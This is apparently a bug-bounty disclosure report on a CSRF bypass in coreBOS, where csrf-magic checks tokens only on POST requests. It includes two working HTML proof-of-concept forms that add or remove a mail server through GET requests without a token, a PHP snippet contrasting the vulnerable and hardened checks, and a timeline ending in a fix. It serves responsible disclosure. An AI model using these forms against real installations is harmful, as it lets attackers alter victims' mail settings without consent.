Bypassing CSRF on Multiple Endpoint in tsolucio/corebos

Valid

Reported on

Jun 26th 2022


Description

It's possible to bypass the CSRF protection already implemented in the coreBOS CMS. When a request does not contain a valid CSRF token, the page displays an error like:

CSRF Error. The reason this happens is that the page has been open without any interaction for too long. For security reason, it has expired. Please reload the page by hitting CTRL + R or press reload below.

It looks like csrf-magic.php / csrf-magic.js only check POST requests and ignore GET requests. The CSRF protection can therefore be bypassed by removing the CSRF token parameter and changing the request from POST to GET.

Proof of Concept

<!-- Add Mail Server - PoC .html -->
<!-- The form has no method attribute, so the browser submits it as GET; the token field is left empty. -->
<html>
  <body>
    <form action="http://localhost:8888/corebos/index.php">
      <input type="hidden" name="module" value="MailManager" />
      <input type="hidden" name="action" value="MailManagerAjax" />
      <input type="hidden" name="file" value="index" />
      <input type="hidden" name="mode" value="ajax" />
      <input type="hidden" name="_operation" value="settings" />
      <input type="hidden" name="_operationarg" value="save" />
      <input type="hidden" name="__vt5rftk" value="" />
      <input type="hidden" name="_mbox_server" value="mail.apapedulimu.click" />
      <input type="hidden" name="_mbox_user" value="test@apapedulimu.click" />
      <input type="hidden" name="_mbox_pwd" value="thisisjusttestaccount" />
      <input type="hidden" name="_mbox_protocol" value="IMAP4" />
      <input type="hidden" name="_mbox_ssltype" value="ssl" />
      <input type="hidden" name="_mbox_certvalidate" value="novalidate-cert" />
      <input type="hidden" name="_mbox_refresh_timeout" value="0" />
      <input type="hidden" name="__vt5rftk" value="" />
      <input type="hidden" name="null" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!-- Remove Mail Server - PoC .html -->
<!-- CSRF PoC - generated by Burp Suite Professional; again a GET submission with no token at all. -->
<html>
  <body>
    <form action="http://localhost:8888/corebos/index.php">
      <input type="hidden" name="module" value="MailManager" />
      <input type="hidden" name="action" value="MailManagerAjax" />
      <input type="hidden" name="file" value="index" />
      <input type="hidden" name="mode" value="ajax" />
      <input type="hidden" name="_operation" value="settings" />
      <input type="hidden" name="_operationarg" value="remove" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

An attacker can trick a victim into adding or removing a mail server. I believe that this trick of bypassing the CSRF check can impact many endpoints, but as an example I attached two endpoints.

Occurrences

The code only checks POST requests; it does not check the CSRF token on GET requests.
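As an added illustration (not coreBOS or csrf-magic code), the vulnerable check pattern beside a hardened one: the hardened version keys on whether the operation changes state rather than on the HTTP method, so the GET variant of the PoC is refused. The function names, the `settings` allowlist and the session layout are assumptions.

```php
<?php
// Added example, not coreBOS/csrf-magic code. Assumed: the session holds the
// token under the same name the PoC sends (__vt5rftk), compared with hash_equals().
const CSRF_PARAM = '__vt5rftk';

// Vulnerable pattern from the report: the token is demanded only for POST.
// The PoC form has no method attribute, so the browser sends GET and skips this.
function csrf_check_vulnerable(string $method, array $params, array $session): bool
{
    if ($method !== 'POST') {
        return true;                        // GET never reaches the token check
    }
    return isset($params[CSRF_PARAM], $session[CSRF_PARAM])
        && hash_equals($session[CSRF_PARAM], (string) $params[CSRF_PARAM]);
}

// Hardened pattern: decide by what the request does, not by its method.
// Operations that change state must be POST and must carry a valid token.
// 'settings' is taken from the PoC (_operationarg save/remove); the list is assumed.
const STATE_CHANGING_OPS = ['settings'];

function csrf_check_fixed(string $method, array $params, array $session): bool
{
    $op = $params['_operation'] ?? '';
    if (!in_array($op, STATE_CHANGING_OPS, true)) {
        return true;                        // read-only requests need no token
    }
    if ($method !== 'POST') {
        return false;                       // the GET variant is refused outright
    }
    return isset($params[CSRF_PARAM], $session[CSRF_PARAM])
        && hash_equals($session[CSRF_PARAM], (string) $params[CSRF_PARAM]);
}

// Simulate the "Remove Mail Server" PoC: a cross-site GET with an empty token.
$session = [CSRF_PARAM => bin2hex(random_bytes(16))];
$poc = ['module' => 'MailManager', 'action' => 'MailManagerAjax',
        '_operation' => 'settings', '_operationarg' => 'remove', CSRF_PARAM => ''];
$legit = array_replace($poc, [CSRF_PARAM => $session[CSRF_PARAM]]);

printf("vulnerable, GET PoC : %s\n", csrf_check_vulnerable('GET', $poc, $session) ? 'allowed' : 'blocked');
printf("fixed, GET PoC      : %s\n", csrf_check_fixed('GET', $poc, $session) ? 'allowed' : 'blocked');
printf("fixed, POST + token : %s\n", csrf_check_fixed('POST', $legit, $session) ? 'allowed' : 'blocked');
```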

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
Nosa Shandy
5 months ago

Researcher


Hi Team,

For a clear step-by-step, you can see this video in which I reproduce the issue:

https://drive.google.com/file/d/13KZ7nRTMyIN7CiipPrN7ITSjzAkOqRrh/view?usp=sharing

Thanks!

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 3 months ago
Nosa Shandy has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes marked this as fixed in 8.0 with commit d0bf45 3 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
csrf-magic.php#L203-L206 has been validated